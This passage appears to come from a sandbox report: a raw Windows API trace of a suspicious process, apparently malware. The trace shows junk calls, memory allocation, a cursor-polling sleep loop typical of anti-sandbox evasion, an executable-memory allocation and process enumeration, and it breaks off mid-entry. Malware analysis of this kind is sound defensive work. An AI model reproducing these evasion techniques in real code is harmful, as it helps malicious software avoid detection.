lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.629] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.629] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.629] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.629] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.629] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.629] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.629] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.629] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.629] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.629] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.629] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.629] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.629] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.629] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.629] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.629] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.629] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.629] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.633] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.633] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.633] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.634] VirtualAlloc (lpAddress=0x0, dwSize=0x21930000, flAllocationType=0x2000, flProtect=0x1) returned 0x2e20000 [0192.653] VirtualAlloc (lpAddress=0x2e20000, dwSize=0x2192c000, flAllocationType=0x1000, flProtect=0x4) returned 0x2e20000 [0204.719] GetCursorPos (in: lpPoint=0x18ff2c | out: lpPoint=0x18ff2c*(x=452, y=497)) returned 1 [0204.720] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=452, y=497)) returned 1 [0204.720] Sleep (dwMilliseconds=0xac) [0204.907] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=452, y=497)) returned 1 [0204.908] Sleep (dwMilliseconds=0xac) [0205.095] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=452, y=497)) returned 1 [0205.095] Sleep (dwMilliseconds=0xac) [0205.295] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=452, y=497)) returned 1 [0205.295] Sleep (dwMilliseconds=0xac) [0205.493] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=452, y=497)) returned 1 [0205.493] Sleep (dwMilliseconds=0xac) [0205.672] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=452, y=497)) returned 1 [0205.672] Sleep (dwMilliseconds=0xac) [0205.901] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=452, y=497)) returned 1 [0205.901] Sleep (dwMilliseconds=0xac) [0206.077] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=452, y=497)) returned 1 [0206.077] Sleep (dwMilliseconds=0xac) [0206.264] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=452, y=497)) returned 1 [0206.264] Sleep (dwMilliseconds=0xac) [0206.451] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=452, y=497)) returned 1 [0206.452] Sleep (dwMilliseconds=0xac) [0206.638] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=452, y=497)) returned 1 [0206.638] Sleep (dwMilliseconds=0xac) [0206.831] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=452, y=497)) returned 1 [0206.831] Sleep (dwMilliseconds=0xac) [0207.013] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=452, y=497)) returned 1 [0207.013] Sleep (dwMilliseconds=0xac) [0207.201] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=452, y=497)) returned 1 [0207.201] Sleep (dwMilliseconds=0xac) [0207.408] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=497)) returned 1 [0207.408] Sleep (dwMilliseconds=0xac) [0207.590] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=497)) returned 1 [0207.590] Sleep (dwMilliseconds=0xac) [0207.778] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=497)) returned 1 [0207.778] Sleep (dwMilliseconds=0xac) [0207.975] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=497)) returned 1 [0207.975] Sleep (dwMilliseconds=0xac) [0208.152] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=497)) returned 1 [0208.152] Sleep (dwMilliseconds=0xac) [0208.339] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=497)) returned 1 [0208.339] Sleep (dwMilliseconds=0xac) [0208.527] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=497)) returned 1 [0208.527] Sleep (dwMilliseconds=0xac) [0208.713] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=497)) returned 1 [0208.713] Sleep (dwMilliseconds=0xac) [0208.901] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=497)) returned 1 [0208.901] Sleep (dwMilliseconds=0xac) [0209.088] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=497)) returned 1 [0209.088] Sleep (dwMilliseconds=0xac) [0209.275] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=497)) returned 1 [0209.275] Sleep (dwMilliseconds=0xac) [0209.462] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=497)) returned 1 [0209.462] Sleep (dwMilliseconds=0xac) [0209.649] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=497)) returned 1 [0209.649] Sleep (dwMilliseconds=0xac) [0209.837] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=497)) returned 1 [0209.837] Sleep (dwMilliseconds=0xac) [0210.024] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=497)) returned 1 [0210.024] Sleep (dwMilliseconds=0xac) [0210.211] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=497)) returned 1 [0210.211] Sleep (dwMilliseconds=0xac) [0210.399] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=497)) returned 1 [0210.399] Sleep (dwMilliseconds=0xac) [0210.782] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=882, y=497)) returned 1 [0210.782] Sleep (dwMilliseconds=0xac) [0210.960] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=882, y=497)) returned 1 [0210.960] Sleep (dwMilliseconds=0xac) [0211.147] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=882, y=497)) returned 1 [0211.147] Sleep (dwMilliseconds=0xac) [0211.335] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=882, y=497)) returned 1 [0211.335] Sleep (dwMilliseconds=0xac) [0211.521] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=882, y=497)) returned 1 [0211.521] Sleep (dwMilliseconds=0xac) [0211.709] VirtualAlloc (lpAddress=0x1da4000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x1da4000 [0211.711] VirtualAlloc (lpAddress=0x0, dwSize=0x100, flAllocationType=0x3000, flProtect=0x4) returned 0x240000 [0211.714] LoadLibraryA (lpLibFileName="shell32") returned 0x76b00000 [0211.715] LoadLibraryA (lpLibFileName="user32") returned 0x77820000 [0211.715] LoadLibraryA (lpLibFileName="advapi32") returned 0x76490000 [0211.715] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2d0000 [0211.716] VirtualAlloc (lpAddress=0x0, dwSize=0x8000005, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0213.413] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe4 [0213.415] Process32FirstW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0213.415] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0213.416] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0213.416] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0213.417] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0213.417] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0213.418] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0213.419] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0213.420] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0213.420] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0213.421] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.421] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.422] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.422] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.423] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x28, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.423] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0213.424] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.424] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0213.425] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0213.425] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.426] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0213.426] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0213.427] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.427] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x548, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0213.428] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0213.429] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0213.429] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x730, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="easily.exe")) returned 1 [0213.430] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x698, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="stockportsconvenient.exe")) returned 1 [0213.430] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dangerous.exe")) returned 1 [0213.431] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="retained_one_psychology.exe")) returned 1 [0213.431] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x760, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pentium-southampton.exe")) returned 1 [0213.432] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="declare.exe")) returned 1 [0213.432] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="credit-albania.exe")) returned 1 [0213.433] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="celebrate.exe")) returned 1 [0213.434] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="watson_block.exe")) returned 1 [0213.434] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beef-http-plants.exe")) returned 1 [0213.435] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="hunting garmin marriage.exe")) returned 1 [0213.436] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="portsmouth_sauce_certificates.exe")) returned 1 [0213.436] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="insights hu.exe")) returned 1 [0213.437] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x578, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="stroke_enough_reporter.exe")) returned 1 [0213.437] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="por tramadol started.exe")) returned 1 [0213.438] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="add.exe")) returned 1 [0213.438] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="argentinasovietavg.exe")) returned 1 [0213.439] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="EXCEL.EXE")) returned 1 [0213.439] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.440] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0213.440] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0213.441] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.441] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x36c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0213.442] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0213.442] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0xbfc, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0213.443] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xbfc, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0213.443] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x81c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Document.exe")) returned 1 [0213.444] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xacc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.445] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, 